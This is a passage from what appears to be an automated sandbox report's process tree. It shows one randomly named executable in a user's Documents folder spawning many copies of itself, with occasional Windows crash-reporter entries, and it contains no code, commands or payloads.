- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:10784
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:4164
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:11576
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:11888
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:12084
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:11412
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:11460
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:12080
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:11340
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:1688
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:3680
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:8052
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:408
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:2072
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:988
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:5968
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:10656
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:4812
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:9576
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:11188
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:11448
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:10032
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:2084
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:8760
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:11440
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:5196
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:9160
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:12536
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:12736
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:13008
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:5044
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:7908
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:13292
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 13292 -s 24
      4⤵
      PID:6812
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:5416
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:12400
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:13428
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:13748
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:14064
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:6852
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:12548
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:14100
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:5420
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:13652
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:15140
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:13492
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:15212
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:15320
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:15516
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:15804
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:16080
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:15600
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:7044
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:15784
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:15220
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:16548
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:17060
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:17064
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:16436
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:15792
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:18120
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:15752
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:7936
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:17700
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:17132
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:16128
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:16904
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:15868
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:14768
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:16684
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:17932
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:18604
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:18872
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:19316
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:17676
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:18552
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:19672
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:19968
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:20368
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:18296
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:18912
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:16480
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:20420
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:17036
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:20256
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:17392
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:15268
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:16388
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:19280
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:7060
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:15448
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:18468
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:16484
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:20756
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:21104
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:21480
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:20776
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:18804
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:21508
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:21944
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:22288
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:22496
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:21800
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:21912
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:19780
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:19616
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:22484
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:22900
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:23192
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:22680
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:16420
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 16420 -s 24
      4⤵
      PID:19364
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:19136
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:22864
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:9948
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:20996
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:20812
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:3840
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:3980
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:22224
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:23860
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:24128
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:23252
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:23936
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:24396
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:18416
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:22136
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:20904
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:24876
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:22860
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 22860 -s 24
      4⤵
      PID:19940
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:25288
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:19428
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:20364
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:18248
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:23508
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:21516
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:18296
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:22872
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:16456
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:19008
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:9572
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:22988
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:25816
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:26120
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:26496
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:20400
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:26132
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:26616
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:25936
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
